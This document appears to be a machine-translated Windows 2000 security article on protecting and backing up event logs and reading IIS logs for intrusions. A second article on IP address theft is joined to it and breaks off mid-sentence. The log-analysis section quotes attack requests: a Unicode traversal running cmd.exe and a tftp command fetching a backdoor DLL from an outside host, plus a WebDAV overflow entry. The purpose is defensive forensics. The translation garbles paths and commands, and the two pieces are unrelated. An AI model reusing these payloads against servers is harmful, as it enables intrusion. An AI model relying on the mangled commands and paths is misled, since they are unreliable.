Protection and Analysis of Windows "black box"

Windows is favored by network administrators for its ease of use. A considerable number of large websites in China are built on Windows 2000/XP. There are more people using Windows and more people studying its security. Here, I would like to remind network administrators that although you have completed all the security patches, who knows when new vulnerabilities will be discovered? Therefore, we should also do a good job of protecting system logs.
As hackers, they are also most concerned about system logs. Once they successfully intrude into the system, the first thing to do is to delete your log files so that you cannot track hacker behavior after being intruded, and checks the operations performed by hackers. Log files are as important as the "black box" in an airplane because they store all the evidence of hacker intrusion.

Log migration and protection

Windows 2000 system log files include application logs, security logs, system logs, DNS service logs, and FTP connection logs and HTTPD logs. By default, the log file size is KB. The default log storage location is as follows:
Security log file: % systemroot % system32config SecEvent. EVT
System log file: % systemroot % system32config SysEvent. EVT
Application Log File: % systemroot % system32config AppEvent. EVT
FTP connection Log and HTTPD transaction Log: % systemroot % system32LogFiles. There are subfolders, respectively for the logs of FTP and Web Services, whose suffix is. Log.
Here, I refer to the log files with the. EVT extension by default as Event Logs. I have read many articles to introduce that event log migration can be well protected. Although shift is a protection method, you only need to input dir c: * in the command line :*. evt/s (if the system is installed on disk D, the drive letter is D). You can find the location of the event log. The log shift is completed by modifying the Registry. We can find the HKEY_LOCAL_MACHINESYSTEM CurrentControlSet ServicesEventlog location in the registry. The following Application, Security, and System subkeys are used, corresponding to "application logs", "security logs", and "system logs" respectively ". To modify the registry, let's take a look at the Application subkey, 1.

Figure 1

File is the location where the "Application log" File is stored. Change this key value to the folder where we want to store the log File, and then change % systemroot % system32configappevent. copy the evt file to this folder and restart the machine. The purpose of this article is to take full advantage of the "Security" attribute of Windows 2000 in the NTFS format. If the file is not moved, security settings cannot be performed on the file, right-click the folder after the shift and select "properties" to go to the "Security" tab. Do not select "allow propagation of inherited permissions from the parent" to add a "System" group, grant the "read" permission to the Everyone group, and select the "full control" and "modify" permissions for the System group. Then change the default log file size to the desired size, for example, 20 MB.
After the above settings are complete, you can directly use Del C :*. evt/s/q cannot be deleted. The command above is used to delete the record files being used by the system in the command line format.

Log file backup

WMI-based Log backup script
WMI (Windows Management Instrumentation) is a Windows system Management tool provided by Microsoft. All scripts developed based on WMI can run successfully on Windows 2000/NT. Microsoft provides a script to Use WMI to set the log file size to 25 MB and allow the log to automatically overwrite the log 14 days ago. (Editor's note: Due to space limitations, the script will not be published. Readers and friends who need it should go to the Microsoft website or ask for it from the editor .)
We only need to save the script. files with the vbs extension can be used. We can also modify the above script to back up log files. I suggest you change the EVT suffix to another suffix during log backup (for example. c) the purpose is to make it difficult for attackers to find it.

Backup Using dumpel
You can use dumpel.exe in the Microsoft Resource kittool to back up log files in the following format:
Dumpel-f file [-s \ server] [-l log [-m source] [-e n1 n2 n3.] [-r] [-t] [-dx]
-S \ server outputs remote computer logs. If it is local, this can be omitted.
-F filename: location and file name of the output log.
-L log can be System, Security, Application, or DNS.
To transfer system logs on the target Server to Systemlog. log, you can use the following format:
Dumpel \ server-l system-f Systemlog. log
You can use scheduled tasks to regularly back up system logs.

HTTPD transaction log analysis

Since Microsoft's IIS 5 was published, many vulnerabilities have been exploited by hackers, such. ida /. idq, unicode, WebDavx3, and some unknown vulnerabilities, we back up logs to analyze hacker intrusions, the following table lists the successful intrusion logs of systems without patch packages.

Unicode vulnerability intrusion Logging
Open the IIS5 Web Service Log file, which is located in the % systemroot % system32LogFiles folder by default. 2 shows a typical log record of Unicode vulnerability intrusion, for normal Web access, you can use the GET command on port 80 to obtain Web data. However, you can bypass character verification by using invalid character encoding to obtain information that is not expected. However, you can add the corresponding patch to block this hole.

Figure 2

For example, you can use the following encoding to view the directory file of the target machine:
GET/_ vti_bin/... % 5c.../... % 5c.../... % 5c ../winnt/system32/cmd.exe/c + dir 200
This access behavior is recorded in the log:
2003-001 08:47:47 192.168.0.1-192.168.0.218 80 GET/_ vti_bin /.. % 5c .. /.. % 5c .. /.. % 5c .. /winnt/system32/cmd.exe/c + dir 200-
However, our logs clearly show that attackers from 192.168.0.1 can view our directories. The following line transmits a backdoor program record to our machine:
2003-001 08:47:47 192.168.0.1-192.168.0.218 80 GET/_ vti_bin /.. % 5c .. /.. % 5c .. /.. % 5c .. /winnt/system32/cmd.exe/c + tftp % 20-i % 2061.48.10.129% 20GET % 20cool. dll % 20c: httpodbc. dll 502-

WebDavx3 remote overflow Logging
Recently, the well-known Wevdavx3 vulnerability in the hacker community is the most widely used. Even systems with the latest SP3 patch will not be spared. If the system suffers this remote overflow attack, log 3 is shown.

We can see this line of information in the figure:
2003-04-18 07:20:13 192.168.0.218-192.168.0.218 80 LOCK
/AAAAA ......
It indicates that our Web service is under attack from 192.168.0.218, and the WEB Service is locked (that is, disabled. Some garbled characters are the offset bit guessing process used in overflow attacks.
The above records the IP addresses of intrusions. This IP address cannot be ruled out as a stepping stone for attackers. That is to say, this IP address may be a "zombie" rather than an attacker's IP address, however, it is still possible to trace the attacker's location by checking other log files.
However, at the end of the article, I would like to say that it is best to install a firewall to record and block hacker behavior.
Optimistic about your IP address
-- Manage vswitch ports to prevent IP address theft
■ Beijing Gao xiuxia
At present, IP address theft is very common. Many "attackers" use address theft to avoid tracking and hiding their own identities. IP address theft infringes on the rights and interests of normal network users and has a huge negative impact on network security and normal network operation, identifying effective preventive measures is an urgent issue.

Common Methods for IP address theft and their prevention mechanisms

IP address theft refers to the use of unauthorized IP addresses to configure computers on the Internet. There are two methods for IP address theft:
First, you can simply modify the IP address for theft. If you use an IP address that is not obtained legally When configuring or modifying the configuration, IP address theft is formed. Because an IP address is a protocol logical address and a value that needs to be set and modified at any time, you cannot modify the IP address of the local machine.
The second is to modify the IP-MAC address at the same time. For the problem of simply modifying the IP address, many units are using IP-MAC bundling technology to solve. But IP-MAC bundling technology cannot prevent users from modifying the IP-MAC. The MAC address is the hardware address of the network device. For Ethernet, it is also known as the NIC address. The MAC address on each Nic must be unique among all Ethernet devices. It is allocated by IEEE and fixed on the NIC. However, some MAC addresses compatible with NICs can be modified through the configuration program. If you change the IP address and MAC address of a computer to the IP address and MAC address of another legitimate host, then the IP-MAC bundling technology is powerless. In addition, for some NICs whose MAC addresses cannot be directly modified, you can also modify the MAC address through the software, that is, by modifying the underlying network software to spoof the upper-layer software.
At present, it is found that the commonly used method of IP address theft is to regularly scan the ARP (address resolution protocol) Table of the routers of the network, get the current IP address and the IP-MAC control relationship, and the valid IP address table, the IP-MAC table compares, if inconsistent, there is an illegal access behavior. In addition, you can also detect IP address theft from the user's fault report (a message indicating a MAC address conflict occurs when an IP address is being stolen. On this basis, the common prevention mechanisms include: IP-MAC binding technology, proxy server technology, IP-MAC-USER authentication and authorization and transparent gateway technology.
These mechanisms have certain limitations, such as IP-MAC bundling technology user management is very difficult; transparent gateway technology requires a dedicated machine for data forwarding, the machine is easy to become a bottleneck. More importantly, these mechanisms do not completely prevent the damage caused by IP address theft. They only prevent IP address theft from directly accessing external network resources. As a matter of fact, because the IP address hacker still has the freedom to completely act in the IP subnet, on the one hand, this behavior will interfere with the use of legitimate users: on the other hand, attackers may exploit this vulnerability to attack other machines and network devices in the subnet. If a proxy server exists in the subnet, hackers can also obtain out-of-network resources through various means.

Use Port location and block IP address theft

A switch is the main network device of a LAN. It works on the data link layer and forwards and filters packets based on MAC addresses. Therefore, each vswitch maintains a MAC address table corresponding to the port. The MAC addresses of any host directly connected to a vswitch or in the same broadcast domain are saved in the MAC address table of the vswitch. The SNMP (Simple Network Management protocol) Management station can communicate with the SNMP proxy of each switch to obtain the MAC address table corresponding to the port saved by each switch, to form a real-time Switch-Port-MAC table. Will be obtained in real time